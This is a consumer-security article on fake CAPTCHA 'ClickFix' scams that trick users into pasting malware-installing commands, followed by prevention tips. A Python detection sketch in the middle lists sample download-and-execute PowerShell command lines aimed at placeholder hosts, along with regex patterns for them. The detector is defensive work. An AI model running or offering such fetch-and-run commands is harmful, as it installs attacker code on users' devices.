Beware of Fake CAPTCHAs That Distribute Malware

CAPTCHA — short for “Completely Automated Public Turing test to tell Computers and Humans Apart” — is a form of online verification that helps distinguish human users from bots on e-commerce login, account registration, and checkout pages. If you can correctly identify a series of distorted letters or all of the photos that include objects like stop signs to prove you’re not a robot, you’re allowed to interact with the site or app.

But just because CAPTCHAs and reCAPTCHAs are ubiquitous doesn’t mean they’re always harmless. Internet users have become accustomed to interacting with CAPTCHAs without thinking, so naturally cybercriminals have found ways to spoof them to spread malware.

How Fake CAPTCHA Sites Spread Malware

CAPTCHA scams use a social engineering tactic known as ClickFix to trick users into downloading and installing malware that gains remote access, logs keystrokes, or steals data from your device. When you interact with a fake CAPTCHA, you allow the malicious website to copy a command to your clipboard; the "verification steps" that follow get you to paste and run that command, which delivers the payload.

As Malwarebytes Labs describes, these CAPTCHA attacks are often initiated when users try to access popular content like movies, music, or news, although malicious links can also be distributed through phishing emails or malvertising. A CAPTCHA pop-up window appears asking you to confirm that you are not a robot, after which you are redirected to another CAPTCHA screen with verification steps that involve a series of keystrokes. If you follow the instructions, you will execute a PowerShell script that downloads and installs the malware.
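From the defender's side, the command that a fake CAPTCHA has the user paste into the Run dialog shows up in endpoint telemetry as a shell interpreter spawned directly by explorer.exe with a download-and-evaluate command line. The following detection sketch is an added example, not code from this article or from Malwarebytes; the event field layout and the sample events are constructed assumptions.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style (assumed layout,
# not real telemetry). Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://fake-captcha.invalid/p | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": 'pwsh -c "Invoke-Expression (Invoke-WebRequest http://verify.invalid/c).Content"'},
    {"parent": r"C:\Program Files\Editor\code.exe",   # developer tooling, benign
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",            # user ran a harmless command
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem"},
]

# Interpreters the ClickFix instructions typically have the victim paste into.
PASTE_TARGETS = ("powershell.exe", "pwsh.exe", "cmd.exe")
# Download idioms followed by a URL, and evaluators that run what was fetched.
FETCH = re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring)\b.*https?://", re.I)
EVAL = re.compile(r"\b(iex|invoke-expression)\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


def score_event(ev):
    """Return the list of ClickFix indicators present in one process-creation event."""
    reasons = []
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    if image not in PASTE_TARGETS:
        return reasons
    # A shell whose parent is the desktop shell is what pasting into Win+R produces.
    if parent == "explorer.exe":
        reasons.append("interpreter launched from explorer.exe (Run dialog)")
    if FETCH.search(ev["cmdline"]):
        reasons.append("fetches a remote URL")
    if EVAL.search(ev["cmdline"]):
        reasons.append("evaluates fetched content")
    if HIDDEN.search(ev["cmdline"]):
        reasons.append("hides its window")
    return reasons


def find_clickfix(events, min_reasons=2):
    """Flag events with at least min_reasons indicators; explorer parent alone is noise."""
    flagged = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            flagged.append((ev["cmdline"], reasons))
    return flagged
```

The threshold keeps an interactive user running an ordinary command from the Run dialog (the last sample) out of the alert queue while both pasted download-and-run commands are flagged.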

I’ve seen several variations of this scheme: In one case, attackers spoofed Booking.com to install a Remote Access Tool (RAT) backdoor, giving them remote control of victims’ machines. In another, repurposed Discord invite links were used to deliver infostealers and keyloggers that compromised users’ credentials. ClickFix also appeared in AI-generated TikTok videos, containing verbal instructions on how to activate the software’s features.

While many ClickFix attacks have targeted Windows users, researchers recently discovered a variant that uses a fake CAPTCHA to install the Atomic macOS Stealer on Apple devices.


How to Prevent CAPTCHA Scams

While many CAPTCHA and reCAPTCHA requests are legitimate, anything that involves instructions — pressing a key combination, opening the Run dialog, or pasting a command on your device — is definitely not. Legitimate CAPTCHAs never ask you to leave the browser, and they won’t direct you to download software or extensions.

Be wary of CAPTCHA forms from sources and sites you don’t know or trust, and never follow the instructions in these pop-ups without thinking. Attackers exploit “verification fatigue,” where users click so quickly on something as mundane as a CAPTCHA that they don’t notice the red flags.

Malwarebytes Labs also recommends disabling JavaScript in your browser, which will prevent malicious websites from writing to your clipboard. While this is useful for improving your online security and privacy, it will also break some features on the websites you visit, rendering many of them essentially unusable, so it is best reserved for pages you don’t know or trust.
